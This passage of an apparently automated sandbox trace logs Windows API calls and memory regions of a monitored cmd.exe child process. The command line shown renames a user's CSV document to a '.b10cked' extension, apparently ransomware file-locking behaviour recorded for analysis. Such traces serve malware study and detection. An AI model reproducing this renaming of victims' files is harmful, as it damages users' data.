lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.711] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x32, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x32, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.712] _close (_FileHandle=4) returned 0 [0232.712] FindNextFileW (in: hFindFile=0x250e50, lpFindFileData=0x1eef4c | out: lpFindFileData=0x1eef4c) returned 0 [0232.712] GetLastError () returned 0x12 [0232.712] FindClose (in: hFindFile=0x250e50 | out: hFindFile=0x250e50) returned 1 [0232.713] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.713] _close (_FileHandle=3) returned 0 [0232.713] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.714] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.714] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.714] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.714] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.714] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.714] SetConsoleInputExeNameW () returned 0x1 [0232.714] GetConsoleOutputCP () returned 0x1b5 [0232.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.715] exit (_Code=0) Process: id = "617" 
image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34445 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34446 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34447 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34448 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34449 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34450 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 
34451 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34452 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 34454 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34783 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34784 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34785 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34786 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 34787 start_va = 0x790000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 34788 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34789 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 
34790 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34791 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34792 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34793 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34794 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34795 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34796 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34797 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34798 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34799 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34800 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34801 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34802 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34803 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34804 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 34805 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34806 start_va = 0x7a0000 end_va = 0x139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Thread: id = 857 os_tid = 0x938 [0232.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff04 | out: lpSystemTimeAsFileTime=0x2cff04*(dwLowDateTime=0xbe235400, dwHighDateTime=0x1d440a9)) [0232.498] GetCurrentProcessId () returned 0x9e0 [0232.498] GetCurrentThreadId () returned 0x938 [0232.498] GetTickCount () returned 0x3ff54 [0232.498] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfefc | out: lpPerformanceCount=0x2cfefc*=28928741969) returned 1 [0232.499] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.499] __set_app_type (_Type=0x1) [0232.499] __p__fmode () returned 0x76b331f4 [0232.499] __p__commode () returned 0x76b331fc [0232.499] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.499] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.500] GetCurrentThreadId () returned 0x938 [0232.500] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x938) returned 0x38 [0232.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.500] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.500] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.500] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.500] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfe94 | out: phkResult=0x2cfe94*=0x0) returned 0x2 [0232.500] VirtualQuery (in: lpAddress=0x2cfecb, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.501] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x2d0000, 
AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0232.501] GetConsoleOutputCP () returned 0x1b5 [0232.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.719] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.719] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.720] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.720] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.720] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.720] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.720] GetEnvironmentStringsW () returned 0x4c0250* [0232.721] FreeEnvironmentStringsW (penv=0x4c0250) returned 1 [0232.721] GetEnvironmentStringsW () returned 0x4c0250* [0232.721] FreeEnvironmentStringsW (penv=0x4c0250) returned 1 [0232.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee04 | out: phkResult=0x2cee04*=0x40) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegCloseKey (hKey=0x40) returned 0x0 [0232.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee04 | out: phkResult=0x2cee04*=0x40) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.722] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.722] RegCloseKey (hKey=0x40) returned 0x0 [0232.722] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.722] srand (_Seed=0x5b8863c0) [0232.722] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" [0232.722] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" [0232.722] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.722] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x4c19b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.722] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.722] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.722] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.722] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.722] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.723] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.723] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.723] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.723] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.723] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.723] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.723] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.723] GetEnvironmentStringsW () returned 0x4c23a0* [0232.723] FreeEnvironmentStringsW (penv=0x4c23a0) returned 1 [0232.723] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.723] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.723] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.723] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.723] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.723] _wcsicmp (_String1="KEYS", 
_String2="CMDCMDLINE") returned 8 [0232.723] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.723] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.723] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.723] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.723] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfbd0, lpFilePart=0x2cfbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfbcc*="Desktop") returned 0x18 [0232.723] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.723] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.724] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.724] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.724] GetEnvironmentStringsW () returned 0x4c2bc0* [0232.724] FreeEnvironmentStringsW (penv=0x4c2bc0) returned 1 [0232.724] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.725] GetConsoleOutputCP () returned 0x1b5 [0232.725] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.725] GetUserDefaultLCID () returned 0x409 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="0") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="0") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="1") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 